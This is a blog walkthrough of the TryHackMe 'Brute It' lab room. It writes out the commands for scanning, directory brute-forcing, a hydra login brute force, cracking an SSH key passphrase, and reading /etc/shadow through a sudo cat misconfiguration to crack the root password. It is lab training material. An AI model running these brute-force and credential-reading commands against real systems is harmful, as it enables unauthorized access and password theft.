Brute it

September 25, 2025 • 2 min read • 79 views

SSH SUDO

Brute it

Introduction

This post documents my approach to the Brute It room on TryHackMe—an environment focused on web and privilege escalation skills using an attack box powered by Kali Linux. The walkthrough follows standard penetration testing methodology. No actual flags or passwords are shared; placeholders are provided where appropriate.

Reconnaissance

Initial recon set the foundation for all subsequent steps. Understanding the attack surface meant collecting key details about running services and exposed endpoints.

Nmap Scan

A comprehensive port scan was performed to discover entry points:

nmap -sC -sV -p- bruteit.thm

Results:

Port Service Details
22 SSH OpenSSH 7.6p1 (Ubuntu)
80 HTTP Apache 2.4.29 (Ubuntu)

No additional significant ports or services were identified.

Web Enumeration

Using Gobuster, directories were brute-forced to reveal hidden resources:

gobuster dir -u http://bruteit.thm -w /usr/share/wordlists/dirb/common.txt

Key discoveries:

  • /admin (login page)
  • /server-status (403 Forbidden)
  • /index.html (default homepage)

Inspecting the source code of /admin revealed a hidden comment with the admin username—a valuable clue for the next step.

Exploitation

Brute-forcing Admin Login

With the admin username obtained, Hydra was used to brute-force web login credentials:

hydra -l admin -P /usr/share/wordlists/rockyou.txt bruteit.thm http-post-form "/admin/:user=^USER^&pass=^PASS^:F=Username or password invalid" -t 4 -w 5 -V

Upon discovering valid credentials:

  • Username: admin
  • Password: <PASSWORD_PLACEHOLDER>

A successful login to the admin panel yielded the web flag:

  • THM{<WEB_FLAG_PLACEHOLDER>}

Obtaining and Cracking the SSH Key

Inside the admin interface, I discovered an encrypted SSH private key for the user john. The following steps were performed:

  1. Converted the private key for John the Ripper using ssh2john: bash ssh2john id_rsa > id_rsa.hash
  2. Cracked the passphrase: bash john id_rsa.hash --wordlist=/usr/share/wordlists/rockyou.txt
  3. Logged in as john: bash ssh -i id_rsa john@bruteit.thm
  4. Retrieved the user flag:
    • THM{<USER_FLAG_PLACEHOLDER>}

Privilege Escalation

I checked sudo privileges for john:

sudo -l

It was discovered that john could run /bin/cat as root without a password. This allowed reading of sensitive files:

sudo /bin/cat /etc/shadow

By extracting root password hashes and running them through John the Ripper, the root password was recovered. After switching to the root user, the root flag was accessible:

  • THM{<ROOT_FLAG_PLACEHOLDER>}

Post Exploitation & Flags

Flag Type Location Value
Web Admin Panel THM{}
User user.txt THM{}
Root /root/root.txt THM{}

Conclusion

Brute It is an excellent exercise in leveraging enumeration, web exploitation, and privilege escalation techniques. Attention to small clues (like HTML comments and accessible sudo commands) and methodical use of standard tools—Hydra, Gobuster, John the Ripper—were crucial to root the box. This walk-through avoids disclosing any sensitive information and serves as a roadmap for those seeking to hone their penetration testing workflow on TryHackMe rooms.

Machine Information

Platform: TryHackMe

Link: https://tryhackme.com/room/bruteit

Difficulty: Easy

Target IP: Bruteit.thm

Share on

← Back to Blog
Haunted Pumpkin CTF →

Comments

Be the first to start the conversation.

Leave a Comment
Never displayed publicly.

All comments are reviewed before appearing.

×
Copyright © Netrunner 2026